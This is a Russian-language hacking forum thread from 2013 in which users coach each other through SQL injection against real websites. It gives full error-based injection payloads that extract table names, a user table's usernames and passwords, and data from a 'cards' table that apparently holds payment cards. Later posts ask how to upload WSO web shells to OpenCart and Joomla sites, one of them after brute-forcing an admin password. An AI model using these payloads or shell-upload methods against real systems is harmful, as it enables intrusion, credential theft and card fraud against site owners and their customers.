HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22791  
Старый 03.10.2013, 21:10
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от zombak18  

неа(
ах да либо запрос на загрузку шелла тоже вариант)
Всё, что идёт перед select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row().

Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)
 
Ответить с цитированием

  #22792  
Старый 03.10.2013, 21:15
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Всё, что идёт после select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row().
Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)
лс глянь.. сайтик кинул

у меня уже не варит

при

Цитата:
Сообщение от None  
union select+count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x
пишет
 
Ответить с цитированием

  #22793  
Старый 03.10.2013, 21:59
wx0
Новичок
Регистрация: 02.10.2013
Сообщений: 6
С нами: 6638006

Репутация: 0
По умолчанию

Обычно эта ошибка от неправильного запроса, нужно для начала найти точку опорную без ошибки и постепенно менять запрос. Есть разные тулзы для такого, но если надо в ручную, могу помочь подобрать запрос если это будет возможно. Если что в лс
 
Ответить с цитированием

  #22794  
Старый 03.10.2013, 22:03
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.

ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t
 
Ответить с цитированием

  #22795  
Старый 03.10.2013, 22:39
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.
ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t
 
Ответить с цитированием

  #22796  
Старый 03.10.2013, 22:55
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от zombak18  

cards - первая таблица, так как limit n,1, где n=0

дальше перебирай с помощью лимита, n=n+1

UPD

смотри



Вот это запрос на выборку данных (usernameи password) из таблицы user. (то, что в области с красной границей, это и есть данные вида usernameassword).

Для перебора используем лимит(то, что в области с желтой границей).
 
Ответить с цитированием

  #22797  
Старый 04.10.2013, 13:54
aivi
Новичок
Регистрация: 18.04.2010
Сообщений: 0
С нами: 8456099

Репутация: 0
По умолчанию

Всем доброго времени суток, подскажите как узнать имя залитого файла. залил шелл формата wso2.php.jpg

Движок на который заливал OpenCart
 
Ответить с цитированием

  #22798  
Старый 04.10.2013, 14:44
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Подскажите..

Как из запроса

Цитата:
Сообщение от None  
or(select 11 from information_schema.tables group by concat((select card from card.cards limit 1,1),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t
сделать запрос по получению всех таблиц или столбцов из таблицы Cards
 
Ответить с цитированием

  #22799  
Старый 04.10.2013, 14:59
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

Код:
$result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii");
тут только в слепую крутить получается через benchmark

в других же случаях выдает niiiii =\

подскажите как ещё попробовать??
 
Ответить с цитированием

  #22800  
Старый 04.10.2013, 16:24
mmx2012
Новичок
Регистрация: 11.06.2012
Сообщений: 1
С нами: 7326326

Репутация: 0
По умолчанию

Приветствую!

Дано: joomla 2.5.x, читалка файлов (через скрипт с file_get_contents), одна слепая скуля и в результате нее (сбрутил пароль из users) доступ в админку джумлы с правами редактора. Вопрос: как залить шелл? Нифига не получается - уже голову всю сломал. Через png с прицепленым к концу wso shell не получается, да и file_priv = N, соответственно через INTO OUTFILE тоже мимо
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.